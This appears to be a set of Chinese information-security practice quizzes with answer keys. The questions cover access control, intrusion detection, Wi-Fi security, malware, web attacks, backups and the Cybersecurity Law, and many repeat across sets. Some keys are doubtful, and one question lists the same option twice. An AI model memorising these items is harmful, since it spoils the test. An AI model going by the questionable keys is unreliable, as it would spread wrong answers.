D、 防火墙

您的答案: 标准答案: C

15、拒绝服务攻击可能造成的危害______

A、 提升权限

B、 导致系统服务不可用

C、 进行挂马

D、 植入病毒

您的答案: 标准答案: B

16、入侵检测系统在进行信号分析时,一般通过三种常用的技术手段,以下哪一种不属于通常的三种技术手段( )

A、 模式匹配

B、 统计分析

C、 完整性分析

D、 密文分析

您的答案: 标准答案: D

17、 基于网络的入侵检测系统的信息源是( )

A、 系统的审计日志

B、 系统的行为数据

C、 应用程序的事务日志文件

D、 网络中的数据包

您的答案: 标准答案: D

18、以下选项中,()不属于访问控制范畴。

A、 强制

B、 自主

C、 文件按名访问

D、 基于角色

您的答案: 标准答案: C

19、PDRR一般是指信息安全保障中的____等主要环节。

A、 策略、保护、响应、恢复

B、 加密、认证、保护、检测

C、 策略、网络攻防、密码学、备份

D、 保护、检测、响应、恢复

您的答案: 标准答案: D

20、公司为了防范内部攻击,下列选项哪个是最好的实施控制措施( )

A、 确保有全面的攻击事件响应计划

B、 为重要系统记录所有的用户活动

C、 对所有的员工或承包商进行犯罪背景检查

D、 根据个人工作职责需要限制访问权

您的答案: 标准答案: D

21、 Windows紧急修复盘不能修复下列哪个项目( )

A、 硬件兼容问题

B、 分区引导扇区

C、 启动环境

D、 系统文件

您的答案: 标准答案: A

22、匿名登录FTP服务器使用的账户名是(

A、 anyone

B、 anonymous

C、 everone

D、 guest

您的答案: 标准答案: B

23、在Windows系统中下列账户不是合法账户的是

A、 abcABC

B、 abc_123

C、 abc123$

D、 abc123*

您的答案: 标准答案: D

24、在设置域账户属性时,( )项策略是不能被设置的

A、 账户登录时间

B、 账户个人信息

C、 账户的权限

D、 指定账户登录域的计算机

您的答案: 标准答案: C

25、Windows系统中权限最高为

A、 administrators

B、 power users

C、 guests

D、 system

您的答案: 标准答案: D

26、 对于企业网络中划分的DMZ区域而言,正确的是( )

A、 DMZ是一个真正可信的网络部分

B、 DMZ网络访问控制策略决定允许或禁止进入DMZ通信

C、 允许外部用户访问DMZ系统上合适的服务

D、 以上三项都是

您的答案: 标准答案: D

27、当用户登录自己电脑时显示错误信息“ 网络中存在重名”,登录后应该( )

A、 打开控制面板中的“系统”工具,修改网络标识中的计算机名

B、 打开“本地连接”属性对话框,修改IP地址

C、 打开管理工具的“本地用户和组”,修改用户名

D、 需要重新安装操作系统

您的答案: 标准答案: A

28、公司为了防范内部攻击,下列选项哪个是最好的实施控制措施______

A、 确保有全面的攻击事件响应计划

B、 为重要系统记录所有的用户活动

C、 对所有的员工或承包商进行犯罪背景检查

D、 根据个人工作职责需要限制访问权

您的答案: 标准答案: D

29、Windows系统中权限最高为______

A、 administrators

B、 power users

C、 guests

D、 system

您的答案: 标准答案: D

30、在Linux系统中,修改口令策略和查看某个用户的口令策略分别是对如下哪两个文件进行操作( )

A、 /etc/login.defs和/etc/shadow

B、 /etc/login.defs和/etc/passwd

C、 /etc/passwd和/etc/shadow

D、 /etc/shadow和/etc/login

您的答案: 标准答案: A

31、可以通过配置_____来防止用户通过多次登录尝试来猜测其他人的密码

A、 密码策略

B、 账户锁定策略

C、 Kerberos策略

D、 审计策略

您的答案: 标准答案: B

32、无线局域网网络标准IEEE802.11的用户认证机制有( )

A、 Open key

B、 Pre-Shared Key authentication

C、 Shared Key authentication

D、 MAC authentication

您的答案: 标准答案: C

33、通过计算机网络给乙发消息,说其同意签定合同。随后甲反悔,不承认发过该条消息。为了防止这种情况发生,应在计算机网络中采用______。

A、 消息认证技术

B、 数据加密技术

C、 防火墙技术

D、 数字签名技术

您的答案: 标准答案: D

34、防止用户被冒名所欺骗的方法是______

A、 对信息源发方进行身份验证

B、 进行数据加密

C、 对访问网络的流量进行过滤和保护

D、 采用防火墙

您的答案: 标准答案: A

35、提供证据表明用户身份真实性的过程称作______。

A、 标识

B、 注册

C、 真实性验证

D、 身份认证

您的答案: 标准答案: D

36、可以被数据完整性机制防止的攻击方式是______

A、 假冒源地址或用户的地址欺骗攻击;

B、 抵赖做过信息的递交行为;

C、 数据中途被攻击者窃听获取;

D、 数据在途中被攻击者篡改或破坏

您的答案: 标准答案: D

37、下列概念中,不能用于身份认证的手段是______。

A、 限制地址和端口

B、 用户名和口令

C、 杀毒软件

D、 智能卡

您的答案: 标准答案: C

38、在一个信息系统的多级密钥体系中,主密钥应该以()形式存在于()中

A、 明文 开放环境

B、 密文 开放环境

C、 明文 安全环境

D、 密文 安全环境

您的答案: 标准答案: C

39、______的概念不完全属于安全范畴。

A、 可用性,机密性,权力分散

B、 匿名性,可生存性,入侵容忍

C、 可审查性,兼容性,防抵赖

D、 完整性,可仲裁性,抗监听

您的答案: 标准答案: C

40、下列选项中,与人机安全交互无关的是______。

A、 情绪和思维

B、 有线网和无线网

C、 声音和视频

D、 手势和表情

您的答案: 标准答案: B

41、近期有曝光,黑客可利用部分显示设备固件缺陷,修改显示信息,这破坏了信息安全的()属性

A、 机密性

B、 完整性

C、 不可否认性

D、 可用性

您的答案: 标准答案: B

42、CIA三元组指的是______。

A、 机密性,完整性,可用性

B、 真实性,完整性,可控性

C、 机密性,真实性,可用性

D、 完整性,可用性,可控性

您的答案: 标准答案: A

43、当文件长度小于500字节时,NTFS把该文件存放在_________。

A、 单独的簇中

B、 文件目录区

C、 MFT中FR中

D、 文件的索引区

您的答案: 标准答案: C

44、为了便于磁盘管理,常把磁盘分为单个的小分区,把这些分区组织起来的结构为_______。

A、 B+树

B、 单向链表

C、 双向链表

D、 队列

您的答案: 标准答案: B

45、 计算机机房灭火使用的是( )

A、 二氧化碳

B、 干粉

C、 七氟丙烷

D、 水

您的答案: 标准答案: C

46、关于计算机机房防静电说法错误的是( )

A、 采用防静电地板;工作人员要求穿着防静电的衣服和鞋袜进入机房工作

B、 室内保持相对湿度允许范围为:45%一65%;计算机与地板有效接地

C、 安装屏蔽材料

D、 机房中办公设备或辅助设备材料应尽量采用产生静电少的材料制作的

您的答案: 标准答案: C

47、 网络准入控制主要组件不包含( )

A、 终端安全检查软件

B、 网络接入设备(接入交换机和无线访问点)

C、 策略/AAA服务器

D、 堡垒主机

您的答案: 标准答案: D

48、以下关于Windows服务器操作系统的特点,说法不正确的是( )

A、 允许在X86架构下硬件平台上安装和使用,能够支持各种网络协议和网络服务

B、 提供必要的网络连接支持,能够连接不同的网络

C、 能够进行系统安全性保护和用户存取权限的控制

D、 具有一定的可扩展性、可用性及易管理性

您的答案: 标准答案: D

49、应急事件分级的依据有哪些( )

A、 事件影响范围和业务重要程度

B、 应急事件类型

C、 应急预案启动的级别

D、 事件分析分析和评估

您的答案: 标准答案: A

50、从信息系统安全角度来看,用于IT项目的业务模板(或案例)文档应该被保留,其保留期为( )

A、 系统的生命周期结束

B、 项目获得批准

C、 用户验收

D、 系统被投入生产

您的答案: 标准答案: A

1、快照技术是一种在线方式的数据保护策略,说法错误的是( )

A、 .基于文件系统

B、 基于卷管理器

C、 基于虚拟化

D、 基于目录

您的答案: 标准答案: D

2、下面关于SSID说法错误的是( )

A、 通过对多个无线接入点AP设置不同的SSID,并要求无线工作站出示正确的SSID才能访问AP

B、 提供了40位和128位长度的密钥机制

C、 只有设置为名称相同SSID的值的电脑才能互相通信

D、 SSID就是一个局域网的名称

您的答案: 标准答案: C

3、 物联网是一种虚拟网络与现实世界实时交互的新型系统,关于特点描述错误的是( )

A、 无处不在的数据感知

B、 以无线为主的信息传输

C、 智能化的信息处理

D、 以物理网传输为主干网

您的答案: 标准答案: D

4、 关于数据备份策略的分类,说法错误的是( )

A、 按照备份的数据量可以分为完全备份、增量备份、差异备份

B、 完全备份所需时间最长,恢复所需时间最短

C、 差异备份节省了磁盘空间,但备份时间比较长

D、 增量备份只备份与前一次相比增加或者被修改的文件、数据

您的答案: 标准答案: C

5、 以下哪一项不是物联网的安全问题( )

A、 感知层安全问题

B、 传输层安全问题

C、 系统层安全问题

D、 应用层安全问题

您的答案: 标准答案: C

6、 将单位内部的局域网接入Internet(因特网)所需使用的接入设备是______。

A、 安全审计设备

B、 集线器

C、 路由器

D、 中继转发器

您的答案: 标准答案: C

7、下列关于Android的描述正确的是______。

A、 默认不支持对APP的权限进行限制,所以比iOS的安全性差

B、 默认不能安装配套市场以外的APP,但是经过用户授权后可以安装

C、 在屏幕被锁定时,默认不允许拨打任何电话号码

D、 即使被种植了木马,只要屏幕不解锁,木马也不能执行

您的答案: 标准答案: B

8、Rootkit的主要目标是______。

A、 隐藏其存在

B、 重新格式化硬盘

C、 复制到其他计算机

D、 启动僵尸网络

您的答案: 标准答案: A

9、计算机病毒有很多种类型,但不包括______。

A、 文件感染类病毒

B、 远程病毒

C、 内存驻留病毒

D、 引导区病毒

您的答案: 标准答案: B

10、钓鱼攻击具有下列选项中除了______以外的所有特点。

A、 欺骗性Web链接

B、 真实的发送方地址

C、 一般性的问候

D、 要求采取行动的紧急请求

您的答案: 标准答案: B

11、下列攻击行为不属于主动性攻击的是( )

A、 拒绝服务攻击(DOS)

B、 中间人攻击(MITM)

C、 网络钓鱼攻击(Phishing)

D、 社会工程学攻击

您的答案: 标准答案: C

12、下列选项中,除了______以外都是杀毒软件发现病毒时的可选项。

A、 清除文件中的病毒

B、 隔离被感染文件

C、 发送邮件告诉攻击者病毒已暴露

D、 删除包含病毒的文件

您的答案: 标准答案: C

13、下列设备中,可隔绝广播风暴的是______

A、 路由器

B、 MODEM

C、 集线器

D、 交换器

您的答案: 标准答案: A

14、关于无线局域网,下面叙述中正确的是( )

A、 802.11a 和02.11b可以在 2.4GHz 频段工作

B、 802.11b 和 802.11g 都可以在 2.4GHz 频段工作

C、 802.11a 和 802.11b 都可以在 5GHz 频段工作

D、 802.11b 和 802.11g 都可以在 5GHz 频段工作

您的答案: 标准答案: B

15、WEP协议的设计目标是:保障数据______。

A、 不可抵赖性

B、 匿名性

C、 抗干扰性

D、 完整性和机密性

您的答案: 标准答案: D

16、从加密类型分析,当无线路由器WIFI密码安全类型为______时,最容易破解

A、 WPA2-PSK

B、 WEP

C、 WPA-PSK

D、 WPA

您的答案: 标准答案: B

17、 从不同厂家购买安全产品,希望一家产品的安全失效不会影响整个系统的安全性,这是利用______来提升安全性。

A、 模糊性

B、 纵深防御

C、 限制性

D、 多样性

您的答案: 标准答案: D

18、试图阻止无线监听但又包含严重缺陷,现在不应再使用的标准是______。

A、 WEP

B、 WAP-2

C、 NICW

D、 INFOMATICS

您的答案: 标准答案: A

19、SSID(Service Set Identifier)______。

A、 是无线网络标识符

B、 不能改变

C、 从不因任何安全原因由无线路由器发送

D、 在有线网络上必须少于4个字符

您的答案: 标准答案: A

20、 保护无线网络的第一步是______。

A、 创建用户名和口令,禁止非法用户访问无线路由器

B、 禁用无线路由器网络共享

C、 使用IP地址过滤

D、 取消非军事区

您的答案: 标准答案: A

21、我们通常所说的10Mb/s和100Mb/s自适应是指

A、 既工作在10Mb/s,同时也工作在100Mb/s

B、 端口之间10Mb/s和100Mb/s传输率的自动匹配功能

C、 既可工作在10Mb/s,也可工作在100Mb/s

D、 其他三项都是

您的答案: 标准答案: B

22、下列设备中,可隔绝广播风暴的是(

A、 路由器

B、 MODEM

C、 集线器

D、 交换器

您的答案: 标准答案: A

23、无线局域网网络标准IEEE802.11的用户认证机制有______

A、 Open key

B、 Pre-Shared Key authentication

C、 Shared Key authentication

D、 MAC authentication

您的答案: 标准答案: C

24、下列方法中,识别Email来源真实性最可靠的是______。

A、 查看发件服务器地址

B、 查看发件人名称

C、 查看发件人地址

D、 查看回信地址

您的答案: 标准答案: A

25、在需要保护的信息资产中____是最重要的

A、 环境

B、 硬件

C、 数据

D、 软件

您的答案: 标准答案: C

26、来自于多个攻击源而不是单一攻击源的攻击,称作______攻击。

A、 分布式

B、 隔离

C、 脚本资源恶意软件

D、 表格资源

您的答案: 标准答案: A

27、DNS属于______协议

A、 应用层

B、 会话层

C、 表示层

D、 数据链路层

您的答案: 标准答案: A

28、浏览器能够打开百度的主页而不能打开必应主页,下列描述肯定错误的是______。

A、 由于ISP限制了IP访问策略

B、 系统遭受了DNS欺骗

C、 浏览器语言设置有误

D、 由于ISP限制了URL访问策略

您的答案: 标准答案: C

29、DNS属于( )协议

A、 应用层

B、 会话层

C、 表示层

D、 数据链路层

您的答案: 标准答案: A

30、 ORACLE数据库不需要使用( )结构来保护数据

A、 数据文件

B、 控制文件

C、 日志

D、 回滚段

您的答案: 标准答案: A

31、为了保证数据库的安全,可采取的措施有误的是( )

A、 自主访问控制

B、 资源控制

C、 安全审计

D、 数据加密

您的答案: 标准答案: B

32、输入正确的域名但却被转换为错误的IP地址,从而将用户指向其他目标网站,用以提高目标网站的访问量,这种攻击是( )

A、 ARP欺骗

B、 DNS欺骗

C、 会话劫持

D、 社交攻击

您的答案: 标准答案: B

33、在进行网络攻击时,隐藏攻击者较好的方法是______。

A、 采用匿名登录

B、 关闭对方的防火墙

C、 使用跳板攻击

D、 以管理员的身份登录

您的答案: 标准答案: C

34、DoS攻击不会破坏的是______。

A、 账户的授权

B、 合法用户的使用

C、 服务器的处理器资源

D、 网络设备的带宽资源

您的答案: 标准答案: A

35、在TCP/IP参考模型中,应用层是最高的一层,它包括了所有的高层协议。下列协议中不属于应用层协议的是_______

A、 HTTP

B、 FTP

C、 UDP

D、 SMTP

您的答案: 标准答案: C

36、TCP协议一般用于______网,向用户提供一种传输可靠的服务

A、 局域网

B、 以太网

C、 广域网

D、 城域网

您的答案: 标准答案: C

37、Tracert命令通过多次向目标发送( )来确定到达目标的路径,在连续发送的多个IP数据包中,TTL字段都是不同的。

A、 ICMP地址请求报文

B、 ARP请求报文

C、 ICMP回声请求报文

D、 ARP响应报文

您的答案: 标准答案: C

38、下列不涉及OSI网络安全体系范畴的是______。

A、 网闸在任意一个具体时刻都不存在内网与外网的物理链路

B、 防火墙中通常集成有对抗DDoS功能

C、 蠕虫的传播主要依赖于对系统漏洞的利用

D、 HTTPS使用了与HTTP不同的传输端口

您的答案: 标准答案: C

39、日前,戴尔的安全威胁应对小组(CTU)检测到一个巨大的针对美国、欧盟、俄罗斯和前苏联国家的军事人员、政府官员、记者和政治活动家的谷歌账户的网络钓鱼活动,该钓鱼活动由俄罗斯APT组织发起。网络钓鱼是属于______的攻击。

A、 网络层

B、 传输层

C、 数据链路层

D、 应用层

您的答案: 标准答案: D

40、帧中继(Frame Relay)交换是以帧为单位进行交换,它是在( )上进行的。

A、 物理层

B、 数据链路层

C、 网络层

D、 运输层

您的答案: 标准答案: B

41、 某业务数据库每周六凌晨进行全库备份,每个工作日凌晨采用增量备份方式,如果想得到周二凌晨的数据库数据,以下还原过程正确的是( )

A、 还原周六的全库备份

B、 还原周六的全库备份,还原周一的增量备份,还原周二的增量备份

C、 还原周六的全库备份,还原周二的增量备份

D、 附加周二的增量备份

您的答案: 标准答案: B

42、 RAID技术能够使得多硬盘读取速度加快及提供一定的容错性,以下读写性能最优且有数 据安全保障的RAID方式是( )

A、 RAID 0

B、 RAID 1

C、 RAID 5

D、 RAID 0+1

您的答案: 标准答案: D

43、保护信息不被偶然或蓄意地删除、修改、伪造、乱序、重放、插入等破坏的属性指的是______。

A、 保密性

B、 完整性

C、 可用性

D、 可靠性

您的答案: 标准答案: B

44、定期对系统和数据进行备份,在发生灾难时进行恢复。该机制是为了满足信息安全的________属性。

A、 保密性

B、 完整性

C、 不可否认性

D、 可靠性

您的答案: 标准答案: D

45、下列选项中______不是灾难恢复计划的特点。

A、 仅允许首席安全官访问

B、 书面的

C、 详细的

D、 定期更新的

您的答案: 标准答案: A

46、信息安全中的木桶原理,是指____

A、 整体安全水平由安全级别最低的部分所决定

B、 整体安全水平由安全级别最高的部分所决定

C、 整体安全水平由各组成部分的安全级别平均值所决定

D、 以上都不对

您的答案: 标准答案: A

47、下列关于预防网络攻击的说法正确的是( )

A、 网站服务器操作系统和 个人电脑 操作系统具有可以信赖的默认安全设置。

B、 入侵防御系统可以记录可疑的网络活动,但在没有用户干预的情况下无法对抗正在进行的攻击。

C、 物理安全威胁的防范包括控制对设备控制台端口的访问、标识关键电缆、安装 UPS 系统以及提供温湿控制。

D、 防止网络钓鱼攻击的最好方法是多采用防火墙设备。

您的答案: 标准答案: C

48、网络管理的功能有_______

A、 性能分析和故障检测

B、 安全性管理和计费管理

C、 网络规划和配置管理

D、 以上都是

您的答案: 标准答案: D

49、信息安全管理最关注的是_____

A、 外部恶意攻击

B、 病毒对PC的影响

C、 内部恶意攻击

D、 病毒对网络的影响

您的答案: 标准答案: C

50、在信息系统安全中,风险由______两种因素共同构成的。

A、 攻击和脆弱性

B、 威胁和攻击

C、 威胁和脆弱性

D、 威胁和破坏

您的答案: 标准答案: C

1、如果想要限制用户过多的占用磁盘空间,应当______

A、 设置磁盘配额

B、 设置数据压缩

C、 设置文件加密

D、 设置动态存储

您的答案: 标准答案: A

2、当用户登录自己电脑时显示错误信息“ 网络中存在重名”,登录后应该______

A、 打开控制面板中的“系统”工具,修改网络标识中的计算机名

B、 打开“本地连接”属性对话框,修改IP地址

C、 打开管理工具的“本地用户和组”,修改用户名

D、 需要重新安装操作系统

您的答案: 标准答案: A

3、Windows紧急修复盘不能修复下列哪个项目______

A、 硬件兼容问题

B、 分区引导扇区

C、 启动环境

D、 系统文件

您的答案: 标准答案: A

4、当安装完Windows操作系统后,在系统盘里会出现“pagefile.sys”隐藏文件,且文件占用空间较大,此文件的作用是______

A、 物理内存

B、 EPROM

C、 ROM

D、 虚拟内存

您的答案: 标准答案: D

5、个人电脑中使用netstat命令查看进程识别符(PID)配合资源管理器查看是否有病毒等恶意进程与外界非法通讯,netstat命令需要配合增加的参数是(

A、 netstat -a

B、 netstat -s

C、 netstat -o

D、 netstat –ano

您的答案: 标准答案: D

6、单位出于安全考虑对内部地址做动态网络地址转换(NAT),不正确的说法是( )

A、 将很多内部地址映射到单个真实地址

B、 外部网络地址和内部地址一对一的映射

C、 最多可有64000个同时的动态NAT连接

D、 每个连接使用一个端口

您的答案: 标准答案: B

7、下列说法中不正确的是( )

A、 各信息系统运营使用单位和主管部门是信息系统定级的责任主体

B、 在安全评估过程中,采用渗透性测试手段,检测系统脆弱性

C、 信息系统的等级应由业务信息系统和服务系统的较高者决定

D、 信息保密性可分为秘密和机密两个等级

您的答案: 标准答案: D

8、定期对系统和数据进行备份,在发生灾难时进行恢复。该机制是为了满足信息安全的( )属性

A、 保密性

B、 完整性

C、 抗抵赖性

D、 可用性

您的答案: 标准答案: D

9、 对于信息安全管理负有责任的是( )

A、 高级管理层

B、 安全管理员

C、 IT管理员

D、 所有与信息系统有关人员

您的答案: 标准答案: D

10、重要安全区域部署安全审计跟踪的是( )

A、 安全审计系统检测并追踪安全事件的过程

B、 安全审计系统收集易于安全审计的数据

C、 人利用日志信息进行安全事件分析和追溯的过程

D、 对计算机系统中的某种行为的详尽跟踪和观察

您的答案: 标准答案: A

11、是企业信息安全的核心( )

A、 安全教育

B、 安全运维措施

C、 安全管理

D、 安全软硬件设施

您的答案: 标准答案: C

12、计算机机房应当符合( )和国家有关规定

A、 防火、防盗、防潮、防尘要求

B、 楼层、位置要求

C、 相关行业标准

D、 国家标准

您的答案: 标准答案: D

13、 网络安全在多网合一时代的脆弱性主要体现在( )

A、 软件的脆弱性

B、 网络的脆弱性

C、 管理的脆弱性

D、 应用的脆弱性

您的答案: 标准答案: C

14、以下哪种不是主机连接存储的常见方式______

A、 DAS

B、 NAS

C、 SAN

D、 IAS

您的答案: 标准答案: D

15、网络扫描器不可能发现的是______。

A、 用户的弱口令

B、 系统的服务类型

C、 系统的版本

D、 用户的键盘动作

您的答案: 标准答案: D

16、HOOK是安全防护软件及恶意软件经常用到劫持技术,将目标函数代码的前面几个字节替换为指向目标代码的跳转指令的技术为()。

A、 EAT HOOK

B、 IAT HOOK

C、 Inline HOOK

D、 IDT HOOK

您的答案: 标准答案: C

17、()破解了英格玛机?

A、 牛顿

B、 图灵

C、 比尔盖茨

D、 赫敏

您的答案: 标准答案: B

18、“进不来” “拿不走” “看不懂” “改不了” “走不脱”是网络信息安全建设的目的。其中,“看不懂”是指下面那种安全服务:

A、 数据加密

B、 身份认证

C、 数据完整性

D、 访问控制

您的答案: 标准答案: A

19、______用于描述损害用户个人信息安全的软件。

A、 间谍软件Spyware

B、 恶意软件Malware

C、 广告软件Ad ware

D、 网络操作系统Netware

您的答案: 标准答案: B

20、______是攻击者安装在计算机上的程序,它篡改Web浏览器的主页和搜索引擎将其指向其它站点。

A、 IE重定位器

B、 互联网服务器重定位器

C、 IMAPI

D、 浏览器劫持软件

您的答案: 标准答案: D

21、以下哪个恶意软件具备穿透还原卡和还原软件的能力?

A、 求职信

B、 求职信

C、 超级工厂

D、 CIH

您的答案: 标准答案: B

22、相比之下,______最不可能隐藏恶意代码。

A、 图片文件

B、 证书文件

C、 MBR

D、 PE文件

您的答案: 标准答案: B

23、攻击者为了使恶意软件具有较长的生命周期,通常需要对其进行免杀处理。这种免杀处理主要是对抗()。

A、 特征码检测

B、 虚拟机

C、 启发式扫描

D、 主动防御

您的答案: 标准答案: A

24、下列对XSS攻击(跨站脚本攻击)描述正确的是______

A、 XSS攻击指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中的html代码会被执行,从而达到恶意攻击用户的特殊目的

B、 XSS攻击是DDOS攻击的一种变种

C、 XSS攻击就是CC攻击

D、 XSS攻击就是利用被控制的机器不断地向被攻击网站发送访问请求,迫使IIS 连接数超出限制,当CPU 资源或者带宽资源耗尽,那么网站也就被攻击垮了,从而达到攻击目的

您的答案: 标准答案: A

25、业务系统在开发过程中植入参数过滤策略可以预防______攻击

A、 SQL注入、跨站脚本、DNS毒药

B、 SQL注入、跨站脚本、缓冲区溢出

C、 SQL注入、跨站请求伪造、网络窃听

D、 跨站请求伪造、跨站脚本、DNS毒药

您的答案: 标准答案: B

26、APT对抗中,整个环节最关键也是最薄弱的一环是:

A、 技术

B、 人

C、 策略

D、 管理制度

您的答案: 标准答案: B

27、业务系统在开发过程中植入参数过滤策略可以预防( )攻击

A、 SQL注入、跨站脚本、DNS毒药

B、 SQL注入、跨站脚本、缓冲区溢出

C、 SQL注入、跨站请求伪造、网络窃听

D、 跨站请求伪造、跨站脚本、DNS毒药

您的答案: 标准答案: B

28、缓冲区溢出攻击针对的目标对象是( )

A、 只是应用层漏洞

B、 只是系统层漏洞

C、 既是系统层漏洞也是应用层漏洞

D、 硬件层漏洞

您的答案: 标准答案: C

29、还未公开的漏洞,称作______漏洞。

A、 未识别攻击向量

B、 资源

C、 不确定

D、 零日

您的答案: 标准答案: D

30、______是指有能力带来威胁的人或事物

A、 漏洞

B、 威胁代理

C、 漏洞利用

D、 风险因子

您的答案: 标准答案: B

31、有人通过朋友圈分享要求他人转发不良信息,否则进行恶毒诅咒。对此应______。

A、 转发信息,不过是手指动一下,转不转全看心情。

B、 此类信息一般没有积极意义,常常涉嫌人身攻击等,不应转发。

C、 涉及个人和家人安危,宁信其有不信其无,不愿意也要转。

D、 直接转发,不多考虑。

您的答案: 标准答案: B

32、正向型和反弹型木马的区别是______。

A、 正向型木马的控制端可以在Internet上使用,而反弹性木马的控制端只能在内网中使用

B、 反弹性木马的控制端可以在Internet上使用,而正向型木马的控制端只能在内网中使用

C、 反弹性木马的受控端可以在内网中使用,而正向型木马的受控端只能在Internet上使用

D、 正向型木马的受控端可以在内网中使用,而反弹性木马的受控端只能在Internet上使用

您的答案: 标准答案: C

33、快照技术是一种在线方式的数据保护策略,说法错误的是______

A、 基于文件系统

B、 基于卷管理器

C、 基于虚拟化

D、 基于目录

您的答案: 标准答案: D

34、该用户希望U盘中的所有可执行程序均无法运行。那么,其最合适的安全规则是()。

A、 路径规则

B、 Internet区域规则

C、 证书规则

D、 散列规则

您的答案: 标准答案: A

35、RAID技术能够使得多硬盘读取速度加快及提供一定的容错性,以下读写性能最优且有数 据安全保障的RAID方式是_____

A、 RAID 0

B、 RAID 1

C、 RAID 5

D、 RAID 0+1

您的答案: 标准答案: D

36、定期对系统和数据进行备份,在发生灾难时进行恢复。该机制是为了满足信息安全的________属性。

A、 保密性

B、 完整性

C、 不可否认性

D、 可用性

您的答案: 标准答案: D

37、保护信息不被偶然或蓄意地删除、修改、伪造、乱序、重放、插入等破坏的属性指的是______。

A、 保密性

B、 完整性

C、 可用性

D、 可靠性

您的答案: 标准答案: B

38、访问网址www.1cbc.com.cn,将可能遭受______攻击?

A、 缓冲区溢出攻击

B、 钓鱼攻击

C、 SQL注入攻击

D、 拒绝服务攻击

您的答案: 标准答案: B

39、无线拒绝服务攻击______。

A、 与有线拒绝服务攻击功能相同

B、 由于其低效性较少被攻击者使用

C、 用于拒绝无线设备访问无线路由器

D、 使用“切断关联”帧来连接到有线网络

您的答案: 标准答案: C

40、当成百上千计算机被远程控制时就形成了______。

A、 僵尸网络

B、 爬虫网络

C、 木马网络

D、 暗网

您的答案: 标准答案: A

41、以通过发现漏洞来提升安全性为目标的黑客,被称作______。

A、 黑帽子黑客

B、 白帽子黑客

C、 牛仔攻击者

D、 资源攻击者

您的答案: 标准答案: B

42、下列哪一项信息不包含在X.509规定的数字证书中?

A、 证书有效期;

B、 证书持有者的公钥;

C、 证书颁发机构的签名;

D、 证书颁发机构的私钥

您的答案: 标准答案: D

43、服务器数字证书能验证组织的存在性和身份,并支持对通信内容的加密。访问带有服务器数字证书的网站时,浏览器会显示______。

A、 绿色复选标记

B、 锁

C、 蓝色地球

D、 计算机

您的答案: 标准答案: B

44、信息安全中的木桶原理,是指____。

A、 整体安全水平由安全级别最低的部分所决定

B、 整体安全水平由安全级别最高的部分所决定

C、 整体安全水平由各组成部分的安全级别平均值所决定

D、 以上都不对

您的答案: 标准答案: A

45、在Windows系统中______是最小运行单位

A、 进程

B、 线程

C、 服务

D、 程序

您的答案: 标准答案: B

46、Windows平台的可执行文件格式是()。

A、 TXT

B、 PE

C、 ELF

D、 PPT

您的答案: 标准答案: B

47、Windows操作系统便于对动态内存进行管理,设计了堆的空表,空表采用的结构为_______。

A、 B+树

B、 队列

C、 单向链表

D、 双向链表

您的答案: 标准答案: D

48、在缓冲区溢出漏洞攻击中,为了获得目标系统控制权,通常需要一个程序来构造溢出,修改返回地址进而去执行一段攻击者给出的代码,该代码通常被称为________。

A、 ShellCode

B、 Exploit

C、 Metasploit

D、 HackTool

您的答案: 标准答案: A

49、Windows系统会默认创建还原点,该功能主要是为了( ),以防出现意外情况导致数据丢失。

A、 杀毒

B、 加密

C、 备份

D、 格式化

您的答案: 标准答案: C

50、使用nslookup命令查询网址的MX记录,preference数字越小代表优先级低,越大优先级越高。()

A、 对

B、 错

您的答案: 标准答案: B

1、当成百上千计算机被远程控制时就形成了______。

A、 僵尸网络

B、 爬虫网络

C、 木马网络

D、 暗网

您的答案: 标准答案: A

2、以通过发现漏洞来提升安全性为目标的黑客,被称作______。

A、 黑帽子黑客

B、 白帽子黑客

C、 牛仔攻击者

D、 资源攻击者

您的答案: 标准答案: B

3、下列哪一项信息不包含在X.509规定的数字证书中?

A、 证书有效期;

B、 证书持有者的公钥;

C、 证书颁发机构的签名;

D、 证书颁发机构的私钥

您的答案: 标准答案: D

4、服务器数字证书能验证组织的存在性和身份,并支持对通信内容的加密。访问带有服务器数字证书的网站时,浏览器会显示______。

A、 绿色复选标记

B、 锁

C、 蓝色地球

D、 计算机

您的答案: 标准答案: B

5、信息安全中的木桶原理,是指____。

A、 整体安全水平由安全级别最低的部分所决定

B、 整体安全水平由安全级别最高的部分所决定

C、 整体安全水平由各组成部分的安全级别平均值所决定

D、 以上都不对

您的答案: 标准答案: A

6、在Windows系统中______是最小运行单位

A、 进程

B、 线程

C、 服务

D、 程序

您的答案: 标准答案: B

7、Windows平台的可执行文件格式是()。

A、 TXT

B、 PE

C、 ELF

D、 PPT

您的答案: 标准答案: B

8、Windows操作系统便于对动态内存进行管理,设计了堆的空表,空表采用的结构为_______。

A、 B+树

B、 队列

C、 单向链表

D、 双向链表

您的答案: 标准答案: D

9、在缓冲区溢出漏洞攻击中,为了获得目标系统控制权,通常需要一个程序来构造溢出,修改返回地址进而去执行一段攻击者给出的代码,该代码通常被称为________。

A、 ShellCode

B、 Exploit

C、 Metasploit

D、 HackTool

您的答案: 标准答案: A

10、Windows系统会默认创建还原点,该功能主要是为了( ),以防出现意外情况导致数据丢失。

A、 杀毒

B、 加密

C、 备份

D、 格式化

您的答案: 标准答案: C

11、使用nslookup命令查询网址的MX记录,preference数字越小代表优先级低,越大优先级越高。()

A、 对

B、 错

您的答案: 标准答案: B

12、《中华人民共和国网络安全法》从哪天正式施行?()

A、 2017年6月1日

B、 2017年6月2日

C、 2017年6月3日

D、 2017年6月4日

您的答案: 标准答案: A

13、以下哪个不是新时代我们面临的网络危险?()

A、 木马

B、 大数据

C、 病毒

D、 僵尸网络

您的答案: 标准答案: B

14、第一次网络战争是那个国家遭到攻击?()

A、 乌克兰

B、 爱沙尼亚

C、 罗马尼亚

D、 土耳其

您的答案: 标准答案: B

15、“互联网”+行动计划是否起到了对传统产业升级的推动作用?

A、 是

您的答案: 标准答案: A

16、有关网安治理的顶层设计不包括那项?()

A、 网络安全法

B、 电子商务法

C、 电信法

D、 个人财产保护法

您的答案: 标准答案: D

17、《中华人民共和国网络安全法》发布时间是?()

A、 2017年6月1日

B、 2016年6月1日

C、 2016年11月7日

D、 2017年5月1日

您的答案: 标准答案: C

18、网络安全法是基于信息化的时代要求。

A、 是

您的答案: 标准答案: A

19、网络安全法是由几个原因促成的?()

A、 1

B、 2

C、 3

D、 4

您的答案: 标准答案: C

20、网络安全法共有多少条目?()

A、 49

B、 59

C、 69

D、 79

您的答案: 标准答案: D

21、从网络安全法本身看,什么是网络安全?()

A、 一种能力

B、 一种服务

C、 一种态度

D、 一种精神

您的答案: 标准答案: A

